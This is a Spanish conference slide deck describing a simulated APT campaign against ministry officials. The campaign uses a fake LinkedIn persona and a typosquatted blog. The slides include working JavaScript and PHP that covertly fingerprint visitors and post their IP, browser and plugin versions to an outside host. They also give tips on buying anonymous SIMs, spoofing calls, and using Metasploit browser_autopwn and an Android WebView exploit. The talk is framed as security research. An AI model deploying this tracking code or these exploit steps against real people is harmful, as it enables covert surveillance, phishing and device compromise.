RootedSatellite: Valencia

1. ‹#›
Rooted Satellite Valencia
SbD
Buenas
Prác,cas
Forenses:
Casos
reales
en
IOS
y
Linux
Cooking an APT…
in the paranoid way
Lorenzo Martínez R. (@lawwait)

2. [root@localhost ~]# whoami
CTO && Founder www.securizame.com
!
www.SecurityByDefault.com
!
Perito Informático Forense
!
Twitter:
– @lawwait
– @securizame
– @secbydefault
!
Email: lorenzo@securizame.com

3. Historia y agradecimientos
Anterior estudio y experiencia para empresa privada
Generación de APT real
Legalidad del APT
Lecciones aprendidas y extrapolación
Thanks to:
– Yago Jesús… Tons of thanks!
– Grupo de Delitos Telemáticos de la Guardia Civil
Sector público: soy ciudadano
Hasta el Ministerio y más allá…!!!

4. Disclaimer
Para llevar a cabo esta charla, durante la ejecución
de la investigación, se cometieron varias
irregularidades.
El objetivo de la misma es meramente académico,
sin intención de herir ninguna sensibilidad, ni
ridiculizar a nadie
No hagáis esto en casa!!!

5. A Pwnearlo Todo!!!
A Ponerte hacia Toledo!!!
A Putearte También…
!
A Por Todas!

6. Confidencialidad

7. Planificando el APT
El objetivo y su perfil
El punto de entrada
Un perfil con historia creible
Correo electrónico
Vida en redes sociales: Facebook, LinkedIN, Twitter?,
Whatsapp?
Web personal con venenos

8. Material inicial
Ordenador
Disco duro cifrado de host -> Filevault/Bitlocker/
LUKS/¿Truecrypt?
Distribución Live de usar y tirar en máquina virtual
Tarjeta de red wireless externa + cambio de
dirección MAC
Random Agent Spoofer
KeePassX

9. Más Material Necesario
Terminal telefónico (IMEI no asociado)
– Smartphone
– Tienda de segunda mano
– Tienda de accesorios para móviles
!
Tarjeta SIM
– Prepago
– DNI
– Ingeniería Social
– else… para SMS
– http://sms-verification.com
– http://receivefreesms.com

10. Recursos necesarios… y anonimización
!
Correo electrónico
!
Cuenta en BitCoins
!
UKASH 2 Bitcoins
!
Canal cifrado, anónimo y sin logs
!
Free website!

11. Máquina de salto
Máquina virtual guest con FS cifrado,… sobre sistema de
ficheros cifrado en el host
Squid configurado en modo anónimo
VPN hacia iPredator:
– Ruta directa hacia iPredator mediante gateway normal
– Default gateway en el extremo del túnel
– Firewall entrante en interfaz tun0
Opcional: ¿Acceso encapsulado mediante TOR?
Navegación local a través de proxy con Random Agent
Spoofer

12. ¿A quién vamos a liar?

13. Creamos un perfil LinkedIN
Siempre a través de VPN
Comprobación de dirección IP, antes de cualquier cosa
Navegación en “modo porno”
Tráfico de relleno variado: emule
Nos piden una dirección de correo electrónico
Perfil:
– Nombre: Sugerente, no común,… pero sin pasarse
– Nuestra foto
– Presente y pasado
Veneno: Sitio web personal

14. ¿Hasta dónde quiero llegar?
Preparación de la web maliciosa
– Fecha
– Dirección IP
– Referer
– User agent
– Versiones de:
• Java
• Flash
• Quicktime
!
• Shockwave
• WMP
• Silverlight
• RealPlayer
• IEComponent
• ActiveX
• PDFjs

15. Plugins detector (I)
http://www.pinlady.net/PluginDetect/download
<script type="text/javascript" src="hello.js"></script>
<div style="position:relative;">
<div id="plugindetect" style=“position:absolute; left:0px; top:0px;”></div>
!
<script type="text/javascript">!
var ip = "<?php echo $_SERVER['SERVER_ADDR']; ?>";!
var user_agent = "<?php echo $_SERVER['HTTP_USER_AGENT']; ?>";!
var referrer = "<?php echo $_SERVER['HTTP_REFERER']; ?>";!
!
var today = new Date();!
var dd = today.getDate();!
var mm = today.getMonth()+1; //Enero empieza en 0!
var yyyy = today.getFullYear();!
var hh = today.getHours();!
var min = today.getMinutes();!
var seg = today.getSeconds ();

16. Plugins detector (II)
if (dd<10) { dd=‘0'+ dd } !
if (mm<10) { mm=‘0’+ mm } !
if (hh<10) { hh=‘0'+ hh }!
if (min<10) { min ='0'+ min }!
if (seg<10) { seg ='0'+ seg }!
var datetime = dd + "/"+ mm + "/" + yyyy + " "+ hh + ":" + min + ":" + seg;
var width = screen.width;
var height = screen.height;
var flashversion = PluginDetect.getVersion("Flash");
var Java= PluginDetect.getVersion("Java");
var Quicktime = PluginDetect.getVersion("Quicktime");
var Shockwave = PluginDetect.getVersion("Shockwave");
var WMP = PluginDetect.getVersion("WMP");
var Silverlight = PluginDetect.getVersion("Silverlight");
var RealPlayer = PluginDetect.getVersion("RealPlayer");
var IEcomponent = PluginDetect.getVersion("IEcomponent");
var ActiveX = PluginDetect.getVersion("ActiveX");
var PDFjs = PluginDetect.getVersion("PDF.js");
var keep= datetime+ "|IP: " + ip + "|User-Agent " + user_agent + "|Resolution: " +
width +"x"+ height + "|Referer: " + referrer + "|Java: " + Java + "|Flashversion: "+
flashversion + "|Quicktime: " + Quicktime + "|Shockwave: " + Shockwave + "|WMP: " +
WMP + "|Silverlight: " + Silverlight + "|RealPlayer: " + RealPlayer + "|IEComponent: "
+ IEcomponent + "|ActiveX: " + ActiveX + "|PDFjs: " + PDFjs+"n"

17. Plugins detector (III)
var form = document.createElement(‘form');!
form.setAttribute ("method", “POST");!
form.setAttribute("action", “http://www.noenavarro.site90.com/main.php”);!
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", "data");
hiddenField.setAttribute("value", keep);
form.appendChild(hiddenField);
document.body.appendChild(form);
form.submit();
<?php
if(!empty($_POST['data']))
{
$data = $_POST['data'];
$fname = "stats.txt";
$file = fopen($fname, 'a');
fwrite($file, $data);
fclose($file);
}?>
<img src= en_construccion.png>
main.php

18. stats.txt
29/06/2014 14:42:01|IP: 31.170.162.223|User-Agent Mozilla/5.0
(Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/35.0.1916.153 Safari/537.36 OPR/22.0.1471.70|
Referer: |Javanull|Flashversion 13,0,0,0|Quicktime 7,7,3,0|
Shockwave 12,1,0,0|WMP null|Silverlight 5,1,30317,0|RealPlayer
null|IEComponent null|ActiveX null|PDFjs null
| como separador de campos
Importable en Excel

21. Estrategia LinkedIN
Horarios de funcionarios
– 8:00 - 15:00 -> Mayor probabilidad de PC corporativo
– 15:00 - XX:XX -> Dispositivo móvil
Dificultad de búsquedas
Visita de perfiles
Target al Ministerio deseado… abriendo el abanico
Generación de confianza: contactos de ambos sexos, contactos de vidas
pasadas (trabajos anteriores, alumnos del colegio, skills y hobbies, etc,…)
Adición a grupos relacionados + Google hacking
Contactos recomendados
Inconveniente añadido: Vacaciones de verano…

22. Anécdotas LinkedIN
Los DMs
– El desconfiado/suspicaz
– El curioso extrovertido
El linkedin addict!
El que pica el anzuelo
Los “endorsements”
Las felicitaciones por mi actividad
Los múltiples “acojonos”

23. Be Paranoid

24. Mi blog
• Enlace acortado por el propio LinkedIn
• www.noenavarro.site90.com/portugaI.php
• Typosquatting -> portugaI.php vs. portugal.php

25. Mi blog
portugaI.php
…<snip>
var keep= datetime+ "|IP: " + ip + "|User-Agent " + user_agent + "|Resolution: " + width +"x"+
height + "|Referer: " + referrer + "|Java: " + Java + "|Flashversion: "+ flashversion + "|
Quicktime: " + Quicktime + "|Shockwave: " + Shockwave + "|WMP: " + WMP + "|Silverlight: " +
Silverlight + "|RealPlayer: " + RealPlayer + "|IEComponent: " + IEcomponent + "|ActiveX: " +
ActiveX + "|PDFjs: " + PDFjs+"n"
var form = document.createElement('form');
form.setAttribute ("method", "POST");
form.setAttribute("action", "http://www.noenavarro.site90.com/portugal.php");
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", "data");
hiddenField.setAttribute("value", keep);
form.appendChild(hiddenField);
document.body.appendChild(form);
form.submit();
</snip>…

26. Mi blog
• portugal.php
<html>
<?php
if(!empty($_POST['data']))
{
$data = $_POST['data'];
$fname = "stats.txt";
$file = fopen($fname, 'a');
fwrite($file, $data);
fclose($file);
}
?>
!
<body bgcolor="#D3D3D3">
<basefont color="black" face="arial" size="14">
<style>
#marco img {
border: 2px solid #c3c3c3;
background: #ffffff;
padding:5px;
display:block;
}
</style>
<h1>Blog personal de Noelia Navarro</h1>
<h3>
¡Hola lectores! <p>
…

27. • HTML puro
!
• Borrado metadatos en las fotos (sean o no sean
tuyas)
!
• Redacción adecuada al perfil psicológico del
personaje representado
!
• Faltas de ortografía sutiles
Mi blog

28. Yo quiero tener un millón de amigos…
29 contactos

29. Y tú, ¿de quién eres?

30. Clientes vulnerables
IOS 7.1.1 -> http://support.apple.com/kb/HT6297
Android 2.3.6!!!
Java 1.6.0.29 (Sobre Windows 7)
Java 1.6.0.32 (Sobre Windows XP)
Flash 11.4.402.265
Silverlight 5.1.10411.0

32. Else… Lo que “podría” haber hecho
Registro de dominio g0b.es

33. VPS 4 Bitcoins
Else… Lo que “podría” haber hecho

34. Lo que “podría” haber hecho: lo fácil
use auxiliary/server/browser_autopwn

35. En base al navegador según user_agent, redirección adecuada
– Windows: Java, Flash, Silverlight,…
– IOS:
– Phishing por time-out
– Poner en title una URL válida,…
– Android:
– use exploit/android/browser/
webview_addjavascriptinterface (CVE-2013-4710)
– USSD -> <iframe> tel: </iframe>
Lo que “podría” haber hecho: personalizado

36. Lo que “podría” haber hecho

37. AndroRAT

38. • Compra de certificado SSL (Comodo)
Else… Lo que podría haber hecho

39. Spoofing de llamada
iPredator
!
Google Hangouts Dialer
!
Spoofcard
!
Pranking:
– Número de “mi ministerio”
– Modificación de voz
– Grabación de llamada

40. Sé lo que hiciste el último verano…

41. Hasta pronto!! (Tres años y un día)Disclaimers y Conclusiones
Para llevar a cabo esta charla, durante la ejecución
de la investigación, se cometieron varias
irregularidades
El objetivo de la misma es meramente académico (y
para esta conferencia), sin intención de herir ninguna
sensibilidad, ni ridiculizar a nadie
He cedido todo el material y explicaciones con mayor
detalle al Grupo de Delitos Telemáticos de la Guardia
Civil

42. Email me: lorenzo@securizame.com
Twitter: @lawwait @securizame @secbydefault
SbD